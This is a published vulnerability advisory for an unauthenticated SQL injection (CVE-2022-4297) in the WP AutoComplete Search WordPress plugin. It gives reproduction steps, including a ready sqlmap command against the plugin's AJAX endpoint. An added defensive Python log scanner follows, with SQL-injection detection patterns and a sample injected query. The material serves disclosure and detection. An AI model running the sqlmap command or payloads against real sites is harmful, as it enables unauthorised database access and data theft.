WordPress WP AutoComplete Search 1.0.4 SQL Injection

2023.07.05
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
# Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali Linux

---------------------------------------

The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.

--------------------------------------

How to Reproduce this Vulnerability:

1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 uses the q parameter for AJAX requests
3. Find requests that belong to WP AutoComplete, like the one in step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
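
For defenders, a way to spot this traffic in web server access logs, as an added example that is not part of the original advisory or the plugin's code. The endpoint path, the action name wi_get_search_results and the q parameter come from the advisory; the Combined Log Format, the marker list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path, action and parameter names are taken from the advisory.
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "wi_get_search_results"

# Assumed heuristic: SQL syntax that a normal search term rarely contains.
# A bare apostrophe ("men's") will also match, so treat hits as leads, not verdicts.
SQL_MARKERS = re.compile(
    r"""('|"|--|/\*|;|\b(union|select|sleep|benchmark|information_schema)\b)""",
    re.IGNORECASE,
)

# Assumed Combined Log Format: client IP first, request line in double quotes.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_requests(lines):
    """Return (client_ip, decoded q) for plugin AJAX calls whose q looks like SQL."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != AJAX_PATH:
            continue
        # parse_qs percent-decodes values, so encoded quotes are seen as quotes.
        params = parse_qs(url.query, keep_blank_values=True)
        if ACTION not in params.get("action", []):
            continue
        hits.extend((m.group("ip"), q) for q in params.get("q", [])
                    if SQL_MARKERS.search(q))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jul/2023:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?q=shoes&Limit=1000&action=wi_get_search_results HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/Jul/2023:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?q=a%27%20OR%20%271%27%3D%271&Limit=1000&action=wi_get_search_results HTTP/1.1" 200 20',
    '198.51.100.7 - - [05/Jul/2023:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?q=x%27&action=heartbeat HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    for ip, q in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(q))
```

Only query strings appear in access logs, so requests that send q in a POST body need a WAF or application-level log to be covered by the same check.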

